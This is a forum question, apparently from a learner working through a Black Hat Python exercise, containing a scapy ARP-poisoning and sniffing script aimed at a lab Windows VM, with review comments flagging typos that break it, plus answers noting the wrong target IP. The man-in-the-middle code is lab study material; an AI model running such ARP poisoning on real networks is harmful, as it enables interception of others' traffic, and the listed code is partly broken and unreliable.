I'm working through the section on ARP poisoning with scapy in the fourth chapter of Justin Seitz's Black Hat Python book, and I'm having trouble obtaining the MAC address for the target machine's IP. I'm using a Kali VM as the attacking machine and a Win 7 VM as the target machine.
from scapy.all import *
import os
import sys
import threading
import signal
# Interface that scapy sends on and sniffs from (assigned to conf.iface below).
interface = "eth0"
# NOTE(review): the ifconfig output on this page shows eth0 itself holding
# 10.0.2.15, so this is the address of the machine running the script, not of
# the Win 7 guest. A who-has request for the sender's own address would
# normally go unanswered, which matches the "Failed to get target MAC" output.
# Confirm the guest's address from its own network settings.
target_ip = "10.0.2.15"
# Gateway of the lab network; its MAC is resolved with get_mac() at start-up.
gateway_ip = "10.0.2.2"
# Number of packets sniff() collects before the capture is written out.
packet_count = 1000
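def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-announce the genuine IP-to-MAC bindings, then interrupt the process.

    Sends five ARP replies (op=2) that carry the gateway's real MAC for
    gateway_ip, followed by five that carry the target's real MAC for
    target_ip. Both use the broadcast hardware destination. Finally raises
    SIGINT in the current process.

    Args:
        gateway_ip: IP address of the gateway.
        gateway_mac: MAC address previously resolved for gateway_ip.
        target_ip: IP address of the lab target.
        target_mac: MAC address previously resolved for target_ip.
    """
    # Single-argument print in parentheses parses the same on Python 2 and 3.
    print("[*] Restoring target...")

    # Tell the target where the gateway really is.
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)

    # Tell the gateway where the target really is. The class name must be
    # spelled ARP: with any other casing this call raises NameError and the
    # gateway-side half of the clean-up never goes out.
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)

    # SIGINT to our own pid; Python raises it as KeyboardInterrupt in the
    # main thread.
    os.kill(os.getpid(), signal.SIGINT)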
def get_mac(ip_address):
    """Resolve ip_address to a MAC address with a broadcast ARP request.

    Returns the Ethernet source address of the first answer srp() collected,
    or None when nothing answered (2 second timeout, retry=10).
    """
    arp_request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address)
    answered, _unanswered = srp(arp_request, timeout=2, retry=10)

    # Each entry is a (sent, received) pair; only the first reply is used.
    for _sent, reply in answered:
        return reply[Ether].src

    return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Build two ARP replies and re-send both every two seconds.

    Lab exercise from the book chapter cited on this page. The first reply
    (op=2) is addressed to target_ip and claims gateway_ip; the second is
    addressed to gateway_ip and claims target_ip. hwsrc is never set here,
    so presumably scapy fills in the sending interface's MAC -- confirm.

    On the wire this is a fixed-interval stream of unsolicited ARP replies
    in which the MAC bound to an IP changes. That is the pattern switch-side
    ARP inspection and arpwatch-style monitoring look for.
    """
    # The local name shadows the function name inside this body.
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    # NOTE(review): 'posion_target' is not defined anywhere on this page (the
    # local above is 'poison_target'), so this line raises NameError as written.
    posion_target.hwdst = target_mac
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac
    print "[*] Beginning the ARP poison. [CTRL-C to stop]"
    while True:
        try:
            send(poison_target)
            send(poison_gateway)
            # NOTE(review): 'time' is not imported explicitly on this page; it
            # resolves only if the star-import from scapy.all exposes it -- confirm.
            time.sleep(2)
        # NOTE(review): the page runs this function in a threading.Thread.
        # CPython raises KeyboardInterrupt in the main thread, so this handler
        # is presumably never entered from the worker -- confirm.
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    # NOTE(review): the page lost its indentation. These two lines are placed
    # after the loop, where nothing visible can reach them (the loop has no
    # break) -- confirm against the original listing.
    print "[*] ARP poison attack finished."
    return
# Bind scapy to the chosen interface.
# NOTE(review): the assignment is repeated on the next line; the second one
# changes nothing.
conf.iface = interface
conf.iface = interface
# Verbosity 0 keeps scapy from printing its own send/receive chatter.
conf.verb = 0
print "[*] Setting up %s" % interface
# Resolve both MAC addresses up front; either lookup failing ends the run.
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    # NOTE(review): exit status 0 on a failure path; a calling shell cannot
    # tell this apart from a successful run.
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
# This is the lookup that fails in the output shown on this page.
target_mac = get_mac(target_ip)
if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip, target_mac)
# NOTE(review): 'posion_target' is not defined on this page (the function is
# 'poison_target'), so constructing the thread raises NameError as written.
poison_thread = threading.Thread(target=posion_target, args=(
    gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
    print "[*] Starting sniffer for %d packets" % packet_count
    # BPF expression limiting the capture to IP traffic to or from target_ip.
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    # The capture lands in the current working directory and holds whatever
    # the filter matched.
    wrpcap('arper.pcap', packets)
    # Put the real bindings back once the capture is complete.
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
    # Same clean-up when the operator interrupts the capture early.
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)
The attacking machine:
root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
RX packets 101529 bytes 101906744 (97.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34775 bytes 3530239 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 218 bytes 13972 (13.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 218 bytes 13972 (13.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
The output:
root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
You are using the IP of Kali (the attacking machine) as target_ip (10.0.2.15).
Windows runs on the same computer, but inside a virtual machine, and a virtual machine normally has its own IP address ( https://www.quora.com/Do-virtual-machines-have-their-own-IP ).
It is not even certain that Windows in the VM is automatically on the same network. To assign static IPs to the VM and Kali in the same /24
network (i.e. 10.0.2.x/24 - replace the x), see https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address
coder is right: first check that network connectivity is established by pinging.